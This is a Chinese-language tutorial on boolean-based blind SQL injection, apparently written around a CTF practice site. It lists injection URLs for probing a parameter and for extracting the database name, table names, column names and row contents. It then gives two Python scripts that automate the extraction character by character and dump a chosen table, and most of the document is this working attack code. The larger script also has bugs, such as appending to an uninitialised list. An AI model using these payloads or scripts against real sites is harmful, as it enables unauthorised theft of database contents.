SQL盲注小結

SQL 盲注,與通常注入的區別在於,通常的注入攻擊者能夠直接從頁面上看到注入語句的執行結果,而盲注時攻擊者一般是沒法從顯示頁面上獲取執行結果,甚至連注入語句是否執行都無從得知,所以盲注的難度要比通常注入高。目前網絡上現存的 SQL 注入漏洞大可能是 SQL 盲注,因此有必要總結一下。
 
測試是否爲布爾盲注:
http://localhost/index.php?id=2
http://localhost/index.php?id=2'
http://localhost/index.php?id=2''
http://localhost/index.php?id=2%23
http://localhost/index.php?id=2' and 1=1#
 
若爲布爾盲注,則按照如下步驟進行:
1、獲得數據庫的長度
http://localhost/index.php?id=2' and length(database())>1%23
2、獲取數據庫名稱
姿式:http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23
python腳本自動獲取:
import requests  
  
def getDBName(DBName_len):  
    DBName = ""  
     
    success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"  
    success_response_len = len(requests.get(success_url).text)  
     
    url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23"  
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'  
     
    print("Start to retrieve database name...")  
    print("Success_response_len is: ", success_response_len)  
    for i in range( 1, DBName_len + 1):  
        print("Number of letter: " , i)  
        tempDBName = DBName  
        for char in chars:  
            print("Test letter " + char)  
            char_ascii = ord(char)  
            url = url_template.format(i, char_ascii)  
            response = requests.get(url)  
            if len(response.text) == success_response_len:  
                DBName += char  
                print("DBName is: " + DBName + "...")  
                break  
        if tempDBName == DBName:  
            print("Letters too little! Program ended." )  
            exit()  
    print("Retrieve completed! DBName is: " + DBName)  
     
getDBName(5)   

  

3、獲取表長度
姿式:http://localhost/index.php?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
4、獲取表名
和第二步得到數據庫名差很少,姿式稍微變了一下:
http://localhost/index.php?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)), {0}, 1)={1}%23
5、獲取字段的個數和長度
姿式:http://localhost/index.php?id=2' and (select length(column_name) from information_schema.columns where table_name = 0x666C6167 limit 0,1)>0%23
其中limit 0,1表示第一列,limit 1,1爲第二列,依次類推。
6、獲取字段名稱
姿式:http://localhost/index.php?id=2' and ascii(substr((select column_name from information_schema.columns where table_name = 0x666C6167 limit 0,1), {0}, 1))={1}%23
7、脫褲
1.首先判斷有該表有多少條記錄:
http://localhost/index.php?id=2' and (select count(*) from flag)>0%23
2.而後獲取當前記錄的長度:
http://localhost/index.php?id=2' and (select length(flag) from flag limit 0,1)>0%23
3.獲取當前記錄的值:
http://localhost/index.php?id=2' and ascii(substr((select flag from flag limit 0,1), {0}, 1))={1}%23

python腳本php

import requests  
import binascii  
  
MAX_DBName_len = 100  
MAX_TableName_len = 100  
MAX_ColumnName_len = 100  
MAX_Data_len = 100  
MAX_Table_Num = 100  
MAX_Column_Num = 100  
MAX_Data_Num = 100  
  
success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"  
success_response_len = len(requests.get(success_url).text)  
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'  
  
def get_DBName_len():  
    print("Start to get DBName_len...")  
    DBName_len = 0  
    url_template = success_url + "' and (length(database()))>{0}%23"  
    for i in range(0, MAX_DBName_len):  
        url = url_template.format(i)  
        response = requests.get(url)  
        if len(response.text) != success_response_len:  
            DBName_len = i;  
            print("DBName_len is: ", DBName_len)  
            break;  
    if DBName_len == 0:  
        if i == MAX_DBName_len - 1:  
            print("DBName_len > MAX_DBName_len!")  
        print("Cannot get DB_len. Program ended.")  
        exit()  
    return DBName_len  
  
def get_DBName(DBName_len):  
    print("Start to retrieve database name...")  
    DBName = ""  
    url_template = success_url + "' and ascii(substr(database(),{0},1))={1}%23"     
    for i in range(1, DBName_len + 1):  
        print("Number of letter: ", i)  
        tempDBName = DBName  
        for char in chars:  
            print("Test letter " + char)  
            char_ascii = ord(char)  
            url = url_template.format(i, char_ascii)  
            response = requests.get(url)  
            if len(response.text) == success_response_len:  
                DBName += char  
                print("DBName is: " + DBName + "...")  
                break  
        if tempDBName == DBName:  
            print("Letters too little! Program ended.")  
            exit()  
    print("Retrieve completed! DBName is: " + DBName)  
    return DBName  
  
def get_TableName_len(Table_num):  
    print("Start to get TableName_len...")  
    TableName_len = 0  
    url_template = success_url + "' and (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)>{1}%23"  
    for i in range(0, MAX_TableName_len):  
        url = url_template.format(Table_num - 1, i)  
        response = requests.get(url)  
        if len(response.text) != success_response_len:  
            TableName_len = i  
#             print("TabelName_len is: ", TableName_len)  
            break  
    if TableName_len == 0:  
        if i == MAX_TableName_len - 1:  
            print("TableName_len > MAX_TableName_len!")  
#         print("Cannot get TableName_len. Program ended.")  
    return TableName_len  
  
def get_TableName(Table_num, TableName_len):  
    print("Start to get TableName...")  
    TableName = ""  
    url_template = success_url + "' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}%23"     
    for i in range(1, TableName_len + 1):  
        print("Number of letter: ", i)  
        tempTableName = TableName  
        for char in chars:  
            print("Test letter " + char)  
            char_ascii = ord(char)  
            url = url_template.format(Table_num - 1, i, char_ascii)  
            response = requests.get(url)  
            if len(response.text) == success_response_len:  
                TableName += char  
                print("TableName is: " + TableName + "...")  
                break             
        if tempTableName == TableName:  
            print("Letters too little! Program ended.")  
            exit()  
    print("Retrieve completed! TableName is: " + TableName)  
    return TableName  
  
def choose_Table():  
    Tables = []  
    for Table_num in range(1, MAX_Table_Num):  
        TableName_len = get_TableName_len(Table_num)  
        if TableName_len == 0:  
            break  
        TableName = get_TableName(Table_num, TableName_len)  
        Tables.append(TableName)  
    for i in range(len(Tables)):  
        print(i, ": " + Tables[i - 1])  
    value = input('Please input number to choose which table you want to dump:')  
    Table_num_chosen = int(value)  
    print("You have chose table: " + Tables[Table_num_chosen - 1])  
    return Tables[Table_num_chosen - 1]  
  
def get_ColumnName_len(Column_num, TableName):  
    print("Start to get ColumnName_len...")  
    ColumnName_len = 0  
    url_template = success_url + "' and (select length(column_name) from information_schema.columns where table_name = {0} limit {1},1)>{2}%23"  
    for i in range(0, MAX_ColumnName_len):  
        url = url_template.format(str2hex(TableName), Column_num - 1, i)  
        response = requests.get(url)  
        if len(response.text) != success_response_len:  
            ColumnName_len = i  
            print("ColumnName_len is: ", ColumnName_len)  
            break  
    if ColumnName_len == 0:  
        if i == MAX_ColumnName_len - 1:  
            print("ColumnName_len > MAXName_Column_len!")  
    return ColumnName_len  
  
def get_ColumnName(Column_num, ColumnName_len, TableName):  
    print("Start to get ColumnName...")  
    ColumnName = ""  
    url_template = success_url + "' and ascii(substr((select column_name from information_schema.columns where table_name = {0} limit {1},1),{2},1))={3}%23"     
    for i in range(1, ColumnName_len + 1):  
        print("Number of letter: ", i)  
        tempColumnName = ColumnName  
        for char in chars:  
            print("Test letter " + char)  
            char_ascii = ord(char)  
            url = url_template.format(str2hex(TableName), Column_num - 1, i, char_ascii)  
            response = requests.get(url)  
            if len(response.text) == success_response_len:  
                ColumnName += char  
                print("ColumnName is: " + ColumnName + "...")  
                break             
        if tempColumnName == ColumnName:  
            print("Letters too little! Program ended.")  
            exit()  
    print("Retrieve completed! ColumnName is: " + ColumnName)  
    return ColumnName  
  
def get_Columns(TableName):  
    Columns = []  
    for Column_num in range(1, MAX_Column_Num):  
        ColumnName_len = get_ColumnName_len(Column_num, TableName)  
        if ColumnName_len == 0:  
            break  
        ColumnName = get_ColumnName(Column_num, ColumnName_len, TableName)  
        Columns.append(ColumnName)  
    for i in range(len(Columns)):  
        print(i, ": " + Columns[i - 1])  
    return Columns  
  
def get_Data_len(TableName, ColumnName, Data_num):  
    print("Start to get Data_len...")  
    Data_len = 0  
    url_template = success_url + "' and (select length({0}) from {1} limit {2},1)>{3}%23"  
    for i in range(0, MAX_Data_len):  
        url = url_template.format(ColumnName, TableName, Data_num - 1, i)  
        response = requests.get(url)  
        if len(response.text) != success_response_len:  
            Data_len = i  
            print("Data_len is: ", Data_len)  
            break  
    if Data_len == 0:  
        if i == MAX_Data_len - 1:  
            print("Data_len > MAX_Data_len!")  
    return Data_len  
  
def get_Data(TableName, ColumnName, Data_num, Data_len):  
    print("Start to get Data...")  
    Data = ""  
    url_template = success_url + "' and ascii(substr((select {0} from {1} limit {2},1),{3},1))={4}%23"     
    for i in range(1, Data_len + 1):  
        print("Number of letter: ", i)  
        tempData = Data  
        for char in chars:  
            print("Test letter " + char)  
            char_ascii = ord(char)  
            url = url_template.format(ColumnName, TableName, Data_num - 1, i, char_ascii)  
            response = requests.get(url)  
            if len(response.text) == success_response_len:  
                Data += char  
                print("Data is: " + Data + "...")  
                break             
        if tempData == Data:  
            print("Letters too little! Program ended.")  
            exit()  
    print("Retrieve completed! Data is: " + Data)  
    return Data  
  
def get_Data_num(TableName):  
    print("Start to get Data_num...")  
    Data_num = 0  
    url_template = success_url + "' and (select count(*) from {0})>{1}%23"  
    for i in range(0, MAX_Data_Num):  
        url = url_template.format(TableName, i)  
        response = requests.get(url)  
        if len(response.text) != success_response_len:  
            Data_num = i  
            print("Data_num is: ", Data_num)  
            break  
    if Data_num == 0:  
        if i == MAX_Data_Num - 1:  
            print("Data_num > MAX_Data_Num!")  
        print("Cannot get Data_len.")  
    return Data_num  
  
def str2hex(str):  
    result = "0x"  
    str_byte = str.encode()  
    result = result + binascii.b2a_hex(str_byte).decode()  
    return result  
  
DBName_len = get_DBName_len()  
DBName = get_DBName(DBName_len)  
  
TableName = choose_Table()  
Columns = get_Columns(TableName)  
Data_num = get_Data_num(TableName)  
  
Datas = []  
for i in range(len(Columns)):  
    ColumnName = Columns[i]  
    for j in range(Data_num):  
        Data_len = get_Data_len(TableName, ColumnName, Data_num)  
        Data = get_Data(TableName, ColumnName, Data_num, Data_len)  
        Datas[j] += "\t" + Data  
  
print("***************************")  
print("Database: " + DBName + "Table: " + TableName)  
print("***************************")  
print("\t")  
for i in range(len(Columns)):  
    print(Columns[i], end="\t")  
for i in range(Data_num):  
    print(Datas[i])  
print("Program successfully ended!")  
print("***************************")  
# #the first table  
# Table_num = 1  
# TableName_len = get_TableName_len(Table_num)  
# TableName = get_TableName(Table_num, TableName_len)  
#  
# #the first column  
# Column_num = 1  
# ColumnName_len = get_ColumnName_len(Column_num, TableName)  
# ColumnName = get_ColumnName(Column_num, ColumnName_len)  
#   
# #the first record  
# Data_num = 1  
# Data_len = get_Data_len(TableName, ColumnName, Data_num)  
# Data = get_Data(TableName, ColumnName, Data_num, Data_len)  
#  
# print("***************************")  
# print("Database: " + DBName)  
# print("Table: " + TableName)  
# print("Column: " + ColumnName)  
# print("Data: " + Data)  
# print("Program successfully ended!")  
# print("***************************")  
相關文章
相關標籤/搜索